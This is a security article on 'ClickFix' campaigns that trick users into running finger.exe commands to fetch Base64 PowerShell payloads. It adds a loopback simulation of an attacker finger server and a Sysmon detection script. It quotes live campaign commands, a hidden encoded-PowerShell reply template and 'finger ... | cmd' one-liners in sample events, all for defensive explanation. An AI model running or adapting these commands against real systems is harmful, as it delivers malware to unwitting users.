A social engineering technique that cybersecurity researchers track as "ClickFix" is being used to abuse a decades-old Windows command-line tool, finger.exe, to trick users into downloading and executing malicious code. The activity, observed since at least November 2025, uses fake CAPTCHA verification pages to get victims to start the infection chain themselves. The use of the legacy finger protocol is a key characteristic: it lets the threat actors bypass security controls that are not configured to monitor traffic on TCP port 79.
Internet Storm Center (ISC) analysts have been tracking this threat and note two campaigns, KongTuke and SmartApeSG, that use the method. Both begin the same way, by presenting the victim with a convincing fake CAPTCHA page. The approach exploits users' familiarity with "prove you are human" checks, which makes the initial deception effective. That the technique still works points to a persistent gap in environments where older network protocols are neither blocked nor monitored.
The ClickFix Attack Mechanism and Its Exploitation of finger.exe
The core of the attack is the misuse of finger.exe, a utility designed to retrieve user information from a remote system over the finger protocol. Threat actors use this innocuous-looking program to fetch malicious payloads from their command-and-control (C2) servers. ClickFix pages typically instruct the victim to paste a clipboard-loaded command into the Windows Run dialog; in these campaigns that command invokes finger.exe.
For instance, the KongTuke campaign uses a command of the form "finger gcaptcha@captchaver[.]top". The attacker-controlled server answers the finger query not with user information but with a PowerShell command, typically Base64-encoded, which makes it harder to read at a glance. Note that finger.exe itself only prints whatever the server returns; it is the surrounding command line that feeds that text to a shell for execution. Once decoded and run on the victim's machine, the PowerShell script carries out the next stages of the deployment.
The SmartApeSG campaign follows the same pattern with a command such as "finger [email protected][.]108". Here the server's reply is a script that downloads and executes a malicious file. Researchers have seen this script retrieve a file named "yhb.jpg", which is not an image but carries the core malicious payload. The multi-stage approach lets the attackers layer obfuscation and improves the odds that the malware gains persistence on the compromised system without immediate detection.
The attack vector is effective partly because many network security solutions are tuned to monitor modern protocols and can overlook traffic on TCP port 79, the legacy port used by finger. Explicit proxies in corporate networks usually stop it, since finger is not carried over HTTP and the client cannot reach the server through the proxy, but directly connected systems and less rigorously secured networks remain exposed. The reuse of legacy tools in new attacks underscores the need for a security posture that monitors and controls all network traffic, regardless of how obsolete a protocol seems.
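The exchange described above, as an added example that is not part of the ISC write-up or this article: a Python stand-in for finger.exe queries a stand-in for the attacker's server over loopback. The host, port, query name ("gcaptcha") and the stage-2 script are constructed placeholders; the point is that a finger reply is free text the client prints verbatim, and that an -EncodedCommand payload is Base64 of UTF-16LE text, which matters when you try to decode one from a log.

```python
"""Simulated finger exchange: what finger.exe sends, what an attacker-controlled
server can send back, and how the Base64 PowerShell payload decodes.
Added example, not code from the ISC write-up. Host, port, query name and the
stage-2 script are constructed stand-ins; the "server" listens on loopback only."""
import base64
import socket
import threading
from typing import Optional

# Constructed stand-in for stage 2. A real campaign would download and run a
# payload here; this one only emits a marker so the decode step is verifiable.
STAGE2 = 'Write-Host "stage2-would-run-here"'


def encode_powershell(script: str) -> str:
    # powershell.exe -EncodedCommand expects Base64 of UTF-16LE text, not UTF-8.
    # A decoder that assumes UTF-8 sees NUL-interleaved garbage.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")


def fake_c2_server(sock: socket.socket) -> None:
    """Accept one finger query and answer with a command instead of user info."""
    conn, _ = sock.accept()
    with conn:
        query = b""
        while not query.endswith(b"\r\n"):  # RFC 1288: the query ends with CRLF
            chunk = conn.recv(256)
            if not chunk:
                break
            query += chunk
        # The server ignores which "user" was asked for; the reply is whatever
        # the operator wants the victim's shell to run.
        reply = ("powershell -nop -w hidden -EncodedCommand "
                 + encode_powershell(STAGE2) + "\r\n")
        conn.sendall(reply.encode("ascii"))


def finger_query(host: str, port: int, user: str) -> str:
    """Mimic `finger user@host`: send '<user>\\r\\n', return the text reply."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(f"{user}\r\n".encode("ascii"))
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.decode("ascii", errors="replace")


def extract_encoded_command(reply: str) -> Optional[str]:
    """Return the decoded script if the reply carries -EncodedCommand (or an alias)."""
    tokens = reply.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-encodedcommand", "-enc", "-ec", "-e"):
            try:
                return decode_powershell(tokens[i + 1])
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def run_exchange(user: str = "gcaptcha") -> dict:
    """Start the fake server on an ephemeral loopback port, query it, decode the reply."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    t = threading.Thread(target=fake_c2_server, args=(srv,), daemon=True)
    t.start()
    reply = finger_query("127.0.0.1", port, user)
    t.join(5)
    srv.close()
    return {"query": f"{user}\r\n", "reply": reply,
            "decoded": extract_encoded_command(reply)}


if __name__ == "__main__":
    r = run_exchange()
    print("client sent :", r["query"].encode())
    print("server reply:", r["reply"].strip())
    print("decoded     :", r["decoded"])
```

Nothing in the protocol authenticates the server or constrains the reply, which is why a C2 can answer a "user lookup" with a command line; on the victim, it is the shell the reply is piped into, not finger.exe, that executes it. When triaging a captured reply, decode the Base64 as UTF-16LE as above.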
Implications and Future Concerns for Cybersecurity
The ClickFix campaigns are a reminder that threat actors keep finding ways to repurpose existing tools and protocols to get around defenses. Relying on the finger protocol and its finger.exe client, largely forgotten by many IT professionals, exposes a gap in security awareness and proactive hardening: a built-in binary with almost no legitimate use on a modern endpoint was still available to fetch and run attacker-supplied text. Security teams need to stay alert to social engineering that leans on outdated technology.
That KongTuke and SmartApeSG are ongoing suggests the method is working and will likely be refined and reused. Organizations should review their network security configuration to ensure that traffic on legacy ports, TCP port 79 in particular, is monitored and, where not essential, blocked outbound; where finger.exe has no business use, application control can block the binary itself, while the port-level block also stops renamed copies and other clients that speak the protocol. User education on recognising fake CAPTCHA pages, and on never pasting a command from a web page into the Run dialog or a shell, remains a crucial element in preventing the initial infection.
Security teams will need to keep adapting detection and response as these threats evolve, which may involve more deliberate threat hunting and regular audits of which network protocols are actually in use. The challenge remains balancing operational needs against robust controls that address both modern and legacy attack vectors. Continued analysis of these campaigns by the Internet Storm Center will likely provide further insight into the threat actors' evolving tactics, techniques, and procedures.
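Detection logic for the monitoring gap and the blocking advice above, as an added example that is not part of the ISC write-up or this article: it runs three rules over constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection). The events, timestamps, IP addresses and user names are made up, and the "| cmd" form in the first two events is the usual way a finger reply gets executed rather than something the article shows. The rules are keyed on the PE OriginalFileName and on destination port 79 as well as on the finger.exe path, so a renamed copy or another client speaking the protocol is still caught.

```python
"""Detection logic for finger.exe abuse over constructed Sysmon-style events.
Added example, not code from the ISC write-up: events, hosts, IPs and users
are made up, and the "| cmd" form is the usual way a finger reply is executed,
not something the article itself shows. Field names follow Sysmon's schema."""
import json
import re
from typing import Dict, List

SAMPLE_EVENTS = [
    # 1: shell launched from explorer.exe (Run dialog) that pipes finger output to cmd
    r'{"EventID":1,"UtcTime":"2025-11-20 10:15:02","Image":"C:\\Windows\\System32\\cmd.exe",'
    r'"CommandLine":"cmd /c \"finger gcaptcha@captchaver[.]top | cmd\"",'
    r'"ParentImage":"C:\\Windows\\explorer.exe","User":"CORP\\alice"}',
    # 2: the finger.exe child itself
    r'{"EventID":1,"UtcTime":"2025-11-20 10:15:02","Image":"C:\\Windows\\System32\\finger.exe",'
    r'"OriginalFileName":"finger.exe","CommandLine":"finger gcaptcha@captchaver[.]top",'
    r'"ParentImage":"C:\\Windows\\System32\\cmd.exe",'
    r'"ParentCommandLine":"cmd /c \"finger gcaptcha@captchaver[.]top | cmd\""}',
    # 3: its outbound connection to TCP 79
    r'{"EventID":3,"UtcTime":"2025-11-20 10:15:03","Image":"C:\\Windows\\System32\\finger.exe",'
    r'"DestinationIp":"203.0.113.10","DestinationPort":79,"Protocol":"tcp"}',
    # 4: renamed copy of finger.exe; only the PE OriginalFileName gives it away
    r'{"EventID":1,"UtcTime":"2025-11-20 11:02:44","Image":"C:\\Users\\Public\\svc.exe",'
    r'"OriginalFileName":"finger.exe","CommandLine":"svc.exe x@198.51.100.7",'
    r'"ParentImage":"C:\\Windows\\System32\\cmd.exe"}',
    # 5-6: benign noise that must not fire
    r'{"EventID":3,"UtcTime":"2025-11-20 11:03:00","Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",'
    r'"DestinationIp":"198.51.100.20","DestinationPort":443,"Protocol":"tcp"}',
    r'{"EventID":1,"UtcTime":"2025-11-20 11:04:10","Image":"C:\\Windows\\System32\\notepad.exe",'
    r'"CommandLine":"notepad.exe notes.txt","ParentImage":"C:\\Windows\\explorer.exe"}',
]

# Output of some command piped into cmd/powershell/pwsh (optionally quoted).
PIPE_TO_SHELL = re.compile(r'\|\s*"?(cmd|powershell|pwsh)(\.exe)?\b', re.I)
# The user@host argument finger is asked to look up; surfaced as an IOC for triage.
FINGER_TARGET = re.compile(r"(\S+@\S+)")


def parse_events(lines: List[str]) -> List[Dict]:
    return [json.loads(line) for line in lines]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_finger_binary(ev: Dict) -> bool:
    # Match the PE's OriginalFileName as well as the path so a renamed copy is caught.
    return (_basename(ev.get("Image", "")) == "finger.exe"
            or ev.get("OriginalFileName", "").lower() == "finger.exe")


def detect(events: List[Dict]) -> List[Dict]:
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        cmd = ev.get("CommandLine", "")
        pcmd = ev.get("ParentCommandLine", "")
        if eid == 1 and is_finger_binary(ev):
            # finger.exe is rare on modern endpoints, so any run is worth a look;
            # its output piped into a shell (by it or its parent) is the ClickFix shape.
            piped = bool(PIPE_TO_SHELL.search(cmd) or PIPE_TO_SHELL.search(pcmd))
            m = FINGER_TARGET.search(cmd)
            findings.append({"rule": "finger_exec", "severity": "high" if piped else "medium",
                             "time": ev.get("UtcTime"), "image": ev.get("Image"),
                             "target": m.group(1) if m else None})
        elif eid == 1 and re.search(r"\bfinger\b", cmd, re.I) and PIPE_TO_SHELL.search(cmd):
            # The launching shell's command line carries the whole one-liner.
            m = FINGER_TARGET.search(cmd)
            findings.append({"rule": "finger_output_piped_to_shell", "severity": "high",
                             "time": ev.get("UtcTime"), "image": ev.get("Image"),
                             "target": m.group(1) if m else None})
        elif eid == 3 and ev.get("DestinationPort") == 79:
            # Keyed on the port, not the image, so any client speaking finger fires it.
            findings.append({"rule": "outbound_tcp_79", "severity": "medium",
                             "time": ev.get("UtcTime"), "image": ev.get("Image"),
                             "target": f"{ev.get('DestinationIp')}:79"})
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{f['time']}  {f['severity']:6}  {f['rule']:30}  {f['target']}  ({f['image']})")
```

Feed it real Sysmon JSON (for example from Winlogbeat) instead of SAMPLE_EVENTS. The port-79 rule is the one that survives evasion of the others, and it pairs naturally with an outbound block, for instance a Windows Firewall rule created with New-NetFirewallRule -Direction Outbound -Protocol TCP -RemotePort 79 -Action Block, plus an AppLocker or WDAC rule for finger.exe where nobody legitimately uses it.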

